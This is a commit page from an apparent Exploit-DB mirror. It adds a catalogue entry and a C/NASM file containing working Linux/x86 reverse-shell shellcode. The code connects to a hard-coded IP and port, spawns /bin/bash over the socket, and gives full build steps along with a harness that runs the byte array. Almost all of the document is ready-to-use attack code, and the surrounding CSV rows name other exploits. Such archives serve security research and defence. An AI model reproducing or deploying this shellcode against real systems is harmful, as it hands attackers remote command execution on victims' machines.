bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-03-27

Browse source 
1 new exploits

Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)
This commit is contained in:
Offensive Security 2017-03-27 05:01:17 +00:00
parent f3bbe1df4c
commit d2c8c83204
2 changed files with 100 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
files.csv
View file

@ -16019,6 +16019,7 @@ id,file,description,date,author,platform,type,port
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0
41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0

Can't render this file because it is too large.

99
platforms/lin_x86/shellcode/41723.c Executable file
View file

@ -0,0 +1,99 @@
/*
; File name: reversebash.nasm
; Author: Jasmin Landry (@JR0ch17)
; Purpose: Shellcode that creates a reverse /bin/bash shell on port 54321 to IP address 192.168.3.119
; To change
; Shellcode length: 110 bytes
; Tested on Ubuntu 12.04.5 32-bit (x86)
; Assemble reversebash.nasm file: nasm -f elf32 -o reversebash.o reversebash.nasm -g
; Link: ld -z execstack -o reversebash reversebash.o
; Use objdump to find shellcode and copy it over to the code section of the .c file
; Compile: gcc -m32 -fno-stack-protector -z execstack reversebash.c -o reversebash2
global _start
section .text
_start:
jmp short call_shellcode
shellcode:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
pop edx
push 0x6
push 0x1
push 0x2
mov al, 0x66
mov bl, 0x1
mov ecx, esp
int 0x80
mov esi, eax
xor eax, eax
push eax
push dword [edx+2]
push word [edx]
push word 0x2
mov ecx, esp
push 0x10
push ecx
push esi
mov al, 0x66
mov bl, 0x3
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
loop:
dec cl
mov al, 0x3f
mov ebx, esi
int 0x80
mov esi, eax
jnz loop
xor eax, eax
xor ecx, ecx
push ecx
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx, esp
push ecx
push ebx
mov al, 0xb
mov ecx, esp
xor edx, edx
int 0x80
call_shellcode:
call shellcode
port: db 0xd4, 0x31, 0xc0, 0xa8, 0x3, 0x77 ;First 2 bytes are port and last 4 are IP. Please change these bytes to reflect your environment and recompile.
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x61\x31\xc0\x31\xdb\x31\xc9\x5a\x6a\x06\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\xff\x72\x02\x66\xff\x32\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\x89\xf3\xcd\x80\x89\xc6\x75\xf4\x31\xc0\x31\xc9\x51\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x51\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80\xe8\x9a\xff\xff\xff\xd4\x31\xc0\xa8\x03\x77"; //Again, the last 4 bytes are the IP and the 2 before those are the port.
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}